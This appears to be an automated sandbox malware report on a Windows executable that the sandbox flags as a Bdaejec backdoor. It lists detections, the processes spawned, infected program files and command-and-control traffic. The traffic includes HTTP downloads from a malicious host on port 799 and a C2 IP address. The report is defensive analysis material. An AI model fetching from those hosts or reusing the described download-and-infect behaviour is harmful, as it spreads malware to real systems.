Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BXOZIGZEUa.exe

Overview

General Information

Sample name:BXOZIGZEUa.exe
renamed because original name is a hash value
Original sample name:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8.exe
Analysis ID:1585133
MD5:fa07873f37b171a5567a9b4b3f2c65eb
SHA1:47d5210522d8c54d3076c1467f2f495025037bb6
SHA256:8f5469d96f148afd08a0f693684f9bb0195a5291eb2437214c01465b463acbf8
Tags:exeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:66
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries device information via Setup API
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • BXOZIGZEUa.exe (PID: 5612 cmdline: "C:\Users\user\Desktop\BXOZIGZEUa.exe" MD5: FA07873F37B171A5567A9B4B3F2C65EB)
    • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • JdEV.exe (PID: 3524 cmdline: C:\Users\user\AppData\Local\Temp\JdEV.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 3608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: JdEV.exe PID: 3524JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T06:07:58.585996+010028079081Malware Command and Control Activity Detected192.168.2.54970444.221.84.105799TCP
    2025-01-07T06:08:02.958493+010028079081Malware Command and Control Activity Detected192.168.2.54970544.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T06:07:57.948894+010028385221Malware Command and Control Activity Detected192.168.2.5563991.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: BXOZIGZEUa.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k1.raruAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarSAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarGpAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeReversingLabs: Detection: 97%
    Source: BXOZIGZEUa.exeVirustotal: Detection: 87%Perma Link
    Source: BXOZIGZEUa.exeReversingLabs: Detection: 94%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeJoe Sandbox ML: detected
    Source: BXOZIGZEUa.exeJoe Sandbox ML: detected
    Source: BXOZIGZEUa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior
    Source: BXOZIGZEUa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DB7F2 lstrlenW,SetLastError,FindFirstFileW,GetLastError,__wfullpath,__wsplitpath_s,__wmakepath_s,0_2_004DB7F2
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DB3FE GetModuleHandleW,GetProcAddress,FindFirstFileW,0_2_004DB3FE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004ED5ED __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,0_2_004ED5ED
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_00D129E2
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D12B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00D12B8C

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:56399 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49705 -> 44.221.84.105:799
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49704 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D11099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00D11099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: JdEV.exe, 00000002.00000002.2597280384.0000000000D13000.00000002.00000001.01000000.00000004.sdmp, JdEV.exe, 00000002.00000003.2071431419.00000000011E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000002.2597372810.0000000000D3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.raru
    Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: JdEV.exe, 00000002.00000002.2598094406.0000000002B7A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarGp
    Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarS
    Source: Amcache.hve.2.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: JdEV.exe, 00000002.00000002.2597372810.0000000000D9E000.00000004.00000020.00020000.00000000.sdmp, JdEV.exe, 00000002.00000003.2080979564.0000000000D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comJ
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_00520549 GetClientRect,GetAsyncKeyState,SendMessageW,SetScrollPos,0_2_00520549
    Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_a1dea10d-2
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005220D5 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_005220D5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0055C7D7 __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageW,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetWindowPos,SendMessageW,_memset,_free,SendMessageW,GetParent,0_2_0055C7D7
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0051A90D ScreenToClient,_memset,_free,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_0051A90D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004F4F49 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,0_2_004F4F49
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004F3094 IsWindow,SendMessageW,GetCapture,GetKeyState,GetKeyState,GetKeyState,ImmGetContext,ImmGetOpenStatus,ImmReleaseContext,GetFocus,IsWindow,IsWindow,IsWindow,ClientToScreen,IsWindow,ClientToScreen,0_2_004F3094
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0055F4A8 GetKeyState,GetKeyState,GetKeyState,0_2_0055F4A8
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0051794D SendMessageW,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageW,0_2_0051794D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0055BC41 GetKeyState,GetKeyState,GetKeyState,GetTickCount,SetCapture,PeekMessageW,GetCapture,PeekMessageW,PeekMessageW,PtInRect,GetTickCount,ReleaseCapture,0_2_0055BC41
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0052FE15 GetWindowRect,GetKeyState,GetKeyState,GetKeyState,KillTimer,GetFocus,SetTimer,0_2_0052FE15

    System Summary

    barindex
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: JdEV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem0.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem1.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Windows\inf\oem3.PNFJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005D01700_2_005D0170
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005421180_2_00542118
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CE1200_2_005CE120
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0056083D0_2_0056083D
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0051CF370_2_0051CF37
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_0054107C0_2_0054107C
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005370B10_2_005370B1
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005DF14C0_2_005DF14C
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CF9C80_2_005CF9C8
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D160762_2_00D16076
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D16D002_2_00D16D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\JdEV.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 005CEABF appears 61 times
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 005CF180 appears 49 times
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: String function: 005CEA56 appears 223 times
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592
    Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: BXOZIGZEUa.exe, 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
    Source: BXOZIGZEUa.exeBinary or memory string: OriginalFilenameDriverUninstall.exe@ vs BXOZIGZEUa.exe
    Source: BXOZIGZEUa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: JdEV.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: JdEV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: JdEV.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal66.spre.troj.evad.winEXE@7/16@1/1
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeCode function: 2_2_00D1119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_00D1119F
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_004DD36B CoInitialize,CoCreateInstance,0_2_004DD36B
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005C86A5 GetUserDefaultUILanguage,FindResourceExW,FindResourceW,LoadResource,GlobalAlloc,0_2_005C86A5
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\Desktop\uninstall.logJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3524
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeFile created: C:\Users\user\AppData\Local\Temp\JdEV.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: BXOZIGZEUa.exeVirustotal: Detection: 87%
    Source: BXOZIGZEUa.exeReversingLabs: Detection: 94%
    Source: unknownProcess created: C:\Users\user\Desktop\BXOZIGZEUa.exe "C:\Users\user\Desktop\BXOZIGZEUa.exe"
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exe
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1592
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeProcess created: C:\Users\user\AppData\Local\Temp\JdEV.exe C:\Users\user\AppData\Local\Temp\JdEV.exeJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: devrtl.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: spinf.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: drvstore.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: devobj.dllJump to behavior
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAutomated click: OK
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: BXOZIGZEUa.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
    Source: BXOZIGZEUa.exeStatic file information: File size 1700352 > 1048576
    Source: BXOZIGZEUa.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x126a00
    Source: BXOZIGZEUa.exeStatic PE information: More than 200 imports for USER32.dll
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: BXOZIGZEUa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: BXOZIGZEUa.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: D:\Workspace\Driver\DriverUninstall\Release\DriverUninstall.pdb source: BXOZIGZEUa.exe
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: BXOZIGZEUa.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\JdEV.exeUnpacked PE file: 2.2.JdEV.exe.d10000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005E397D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_005E397D
    Source: initial sampleStatic PE information: section where entry point is pointing to: uY
    Source: BXOZIGZEUa.exeStatic PE information: section name: uY
    Source: JdEV.exe.0.drStatic PE information: section name: .aspack
    Source: JdEV.exe.0.drStatic PE information: section name: .adata
    Source: SciTE.exe.2.drStatic PE information: section name: u
    Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.2.drStatic PE information: section name: PELIB
    Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
    Source: C:\Users\user\Desktop\BXOZIGZEUa.exeCode function: 0_2_005CEB2E push ecx; ret 0_2_005CEB41
